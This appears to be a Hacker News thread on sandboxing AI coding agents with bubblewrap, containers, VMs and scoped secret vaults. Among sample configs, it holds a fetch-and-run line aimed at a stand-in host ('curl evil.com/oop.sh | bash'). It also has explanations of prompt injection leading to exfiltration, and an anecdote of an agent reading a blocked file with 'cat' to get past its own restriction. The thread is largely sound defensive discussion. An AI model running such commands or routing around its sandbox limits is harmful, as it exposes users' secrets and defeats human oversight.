Mysql user: test
Password: mypass123
Host: localhost
...
I could prevent this by running Claude outside of this context. I'm not going to, because this context only has access to my dev secrets. Hence the vault name: `81 Dev environment variables`.
I've configured it so that the 1P CLI only has access to that vault. My prod secrets are in another vault. I achieve this via a OP_SERVICE_ACCOUNT_TOKEN variable set in .zshrc.
I can verify this works by running:
op run --env-file='.env.production' -- printenv
[ERROR] 2026/01/15 21:37:41 "82 Prod environment variables" isn't a vault in this account. Specify the vault with its ID or name.
Also, of course, 1Password pops up a fingerprint request every time something tries to read its database. So if that happened unexpectedly, I'd wonder what was up. I'm acutely conscious of those requests.I can't imagine it's perfect, but I feel pretty good.
Funny enough Bubblewrap is also what Flatpak uses.
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
Yeah, this is the point where I'd want to keep a human in the loop. Because you'd do that if you were pair programming with a human on the same computer, right?
When I have paired, normally the other person can e.g. run the app without getting my review & signoff. Because the other person also is a programmer, (typically) working on their computer.
The overall result will be the product of two minds, but I have never seen a pairing session where the driver waits for permission to run code.
Much better to allow full Bash but run in a sandbox that controls file and network access.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
No, you don't. You have a command generated by auditable, conventional code (in the agent wrapper) rather than by a neural network.
I see what you're saying, makes sense.
FWIW there is (in analytics) also RBAC layer, like "BI tool acting on behalf of user X shall never make edits to tables Y and Z"
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
> Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
One of the things Claude can do is write its own tools, even its own programming languages. There's no fundamental way to make it impossible to run something dangerous, there is only trust.
It's remarkable that these models are now good enough that people can get away with trusting them like this. But, as Simon has himself said on other occasions, this is "normalisation of deviance". I'm rather the opposite: as I have minimal security experience but also have a few decades of watching news about corporations suffering leaks, I am absolutely not willing to run in YOLO mode at this point, even though I already have an entirely separate machine for claude with the bare minimum of other things logged in, to the extent that it's a separate github account specifically for untrusted devices.
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
Famous last words
I’ll stop torturing the analogy now, but what I mean by that is that you can use the tools productively and safely. The insistence on running everything as the same user seems unnecessary. It’s like an X-Y problem.
Really this is on the tool makers (looking at you Anthropic) not prioritizing security by default so the users can just use the tools without getting burned and without losing velocity.
You must not care about those systems that much.
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
Don't leave prod secrets in your dev env.
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions
--bind "$HOME/.claude" "$HOME/.claude"
That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
exec bwrap \
--unshare-pid \
--unshare-ipc \
--unshare-uts \
--share-net \
--bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
--bind "$CURRENT_DIR" "$CURRENT_DIR" \
--bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
--bind "$HOME/.emacs" "$HOME/.emacs" \
--bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
--ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
--ro-bind /bin /bin \
--ro-bind /etc /etc \
--ro-bind /lib /lib \
--ro-bind /lib64 /lib64 \
--ro-bind /usr /usr \
--bind /run/systemd /run/systemd \
--tmpfs /tmp \
--proc /proc \
--dev /dev \
--setenv EDITOR emacs \
--setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
--setenv HOME "$HOME" \
-- \
"opencode" "$@"I'll check this out for sure! I just wish it used bubblewrap or the macos equivalent instead of reaching for containers.
I have also been enjoying having an IDE open so I can interact with the agents as they're working, and not just "fire and forget" and check back in a while. I've only been experimenting with this for a couple of days though, so maybe I'm just not trusting enough of it yet.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
Bubblewrap is a it's a very minimal setuid binary. It's 4000 lines of C but essentially all it does is parse your flags ask the kernel to do the sandboxing (drop capabilities, change namespaces) for it. You do have to do cgroups yourself, though. It's very small and auditable compared to docker and I'd say it's safer.
If you want something with a bit more features but not as complex as docker, I think the usual choices are podman or firejail.
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
Internet to connect with the provider, install packages, and search.
It's not perfect but it's a start.
Let me know if you give it a go ;)
[1]: https://repology.org/project/bubblewrap/information https://repology.org/project/landrun/information
Still, I don’t think bubblewrap is either a simple or safe enough solution.
- totally unsandboxed but I supervise it in a tight loop (the window just stays open on a second monitor and it interrupts me every time it needs to call a tool).
- unsupervised in a VM in the cloud where the agent has root. (I give it a task, negotiate a plan, then close the tab and forget about it until I get a PR or a notification that it failed).
I want either full capabilities for the agent (at the cost of needing to supervise for safety) or full independence (at the cost of limited context in a VM). I don't see a productive way to mix and match here, seems you always get the worst of both worlds if you do that.
Maybe the usecase for this particular example is where you are supervising the agent but you're worried that apparently-safe tool calls are actually quietly leaving a secret that's in context? So it's not that it's a 'mixed' usecase but rather it's just increasing safety in the supervised case?
[1] - https://en.wikipedia.org/wiki/Turtles_all_the_way_down
(If the VM is remote, even more so).
I see there are cloud VMs like at kilocode but they are kind if useless IMO. I can only interact with the prompt and not the code base directly. Too many things go wrong and maybe I also want kilo code to run a docker stack for me which it can't in the agent cloud.
Yes! I'm surprised more people do not want this capability. Check out my comment above, I think Vagrant might also be what you want.
The UI is obviously vibe-coded garbage but the underlying system works. And most of the time you don't have to open the UI after you've set it running you just comment on the Github PR.
This is clearly an unloved "lab" project that Google will most likely kill but to me the underlying product model is obviously the right one.
I assume Microsoft got this model right first with the "assign issue to Copilot" thing and then fumbled it by being Microsoft. So whoever eventually turns this <correct product model> into an <actual product that doesn't suck> should win big IMO.
TLDR:
- Ensure that you have installed npm on your machine.
- Install the dev container CLI globally via npm: `npm i -g @devcontainers/cli`
- Clone the Claude Code repo: https://github.com/anthropics/claude-code
- Navigate into the root directory of that repo.
- Run the dev container CLI command to start the container: `devcontainer --workspace-folder . up`
- Run another dev container command to start Claude in the container: `devcontainer exec --workspace-folder . claude`
And there you go! You have a sandboxed environment for Claude to work in. (As sandboxed as Docker is, at least.)
I like this method because you can just manage it like any other Docker container/volumes. When you want to rebuild it, or reset the volume, you just use the appropriate Docker (and the occasional dev container) commands.
- confused/misaligned agent: probably good enough (as of Q1 2026...).
- hijacked agent: definitely not good enough.
But also it's kinda weird that we still have high-level interfaces that force you to care this much about the type of virtualization it's giving you. We probably need to be moving more towards stuff like Incus here that treats VMs and system containers basically as variants of the same thing that you can manage at a higher level of abstraction. (I think k8s can be like that too).
There are theoretical risks of Claude getting fully owned and going rogue, and doing the iterative malicious work to escape a weaker sandbox, but it seems substantially less likely to me, and therefore perhaps not (currently) worth the extra work.
Why in the cloud and not in a local VM?
I've re-discovered Vagrant and have been using it exactly for this and it's surprisingly effective for my workflows.
https://blog.emilburzo.com/2026/01/running-claude-code-dange...
> Eventually I found this GitHub issue. VirtualBox 7.2.4 shipped with a regression that causes high CPU usage on idle guests.
The list of viable hypervisors for running VMs with 3D acceleration is probably short but I'd hope there are more options these days for running headless VMs. Incus (on Linux hosts) and Lima come to mind and both are alternatives to Vagrant as well.
> VMs with 3D acceleration
I think we don't even need 3D acceleration since Vagrant is running the VMs headless anyways and just ssh-ing in.
> Incus (on Linux hosts)
That looks interesting, though from a quick search it doesn't seem to have a "Vagrantfile" equivalent (is that correct?), but I guess a good old shell script could replace that, even if imperative can be more annoying than declarative.
And since it seems to have a full-VM mode, docker would also work without exposing the host docker socket.
Thanks for the tip, it looks promising, I need to try it out!
It's just YAML config for the VM's resources:
https://linuxcontainers.org/incus/docs/main/howto/instances_...
https://linuxcontainers.org/incus/docs/main/explanation/inst...
And cloud-init for provisioning:
https://gitlab.oit.duke.edu/jnt6/incus-config/-/blob/main/co...
Unfortunately Litterbox won't currently help much for specifically protecting .env files in a project folder though. I'd need to think if the design can be extended for this use-case now that I'm aware of the issue.
https://www.wired.com/story/anthropic-claude-snitch-emergent...
1. allow an agent to run wild in some kind of isolated environment, giving the "tight loop" coding agent experience so you don't have to approve everything it does.
2. let it execute the code it's creating using some credentials to access an API or a server or whatever, without allowing it to exfil those creds.
If 1 is working correctly I don't see how 2 could be possible. Maybe there's some fancy homomorphic encryption / TEE magic to achieve this but like ... if the process under development has access to the creds, and the agent has unfettered access to the development environment, it is not obvious to me how both of these goals could be met simultaneously.
Very interested in being wrong about this. Please correct me!
Where I’m at with #2 is the agent builds a prototype with its own private session credentials.
I have orchestration created that can replicate the prototyping session.
From there I can keep final build keys secret from the agent.
My build loop is meant to build an experiment first, and then an enduring build based on what it figures out.
You setup a simple proxy server on localhost:1234 that forwards all incoming requests to the real API and the crucial part is that the proxy adds the "Auth" header with the real auth token.
This way, the agent never sees the actual auth token, and doesn't have access to it.
If the agent has full internet access then there are still risks. For example, a malicious website could convince the agent itself to perform malicious requests against the API (like delete everything, or download all data and then upload it all to some hacker server).
But in terms of the security of the auth token itself, this system is 100% secure.
Did you make this account to tell me this? Thank you!
If you bind-mount the directory, the sandbox can see the commands, but executing them won’t work since it can’t access the secret service.
You can easily script it to decode passwords on demand.
I originally set up the git filters, but later disabled them.
Are there any good reasons to pick one over the other?
https://gitlab.exherbo.org/sydbox/sydbox
UPDATE: there is other sydbox written in go, not related and seems different too far from bwrap
1. I never use permanent credentials for AWS on my local computer.
2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.
3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).
It’s not foolproof. But it does reduce the attack surface.
The approach I started taking is mounting the directory, that I want the agent to work on, into a container. I use `/_` as the working directory, and have built up some practices around that convention; that's the only directory that I want it to make changes to. I also mount any config it might need as read-only.
The standard tools like claude code, goose, charm, whatever else, should really spawn the agent (or MCP server?) in another process in a container, and pipe context in and out over stdin/stdout. I want a tool for managing agents, and I want each agent to be its own process, in its own container. But just locking up the whole mess seems to work for now.
I see some people in the other comments iterating on what the precise arguments to bubblewrap should be. nnc lets you write presets in Jsonnet, and then refer them by name on the command line, so you can version and share the set of resources that you give to an agent or subprocess.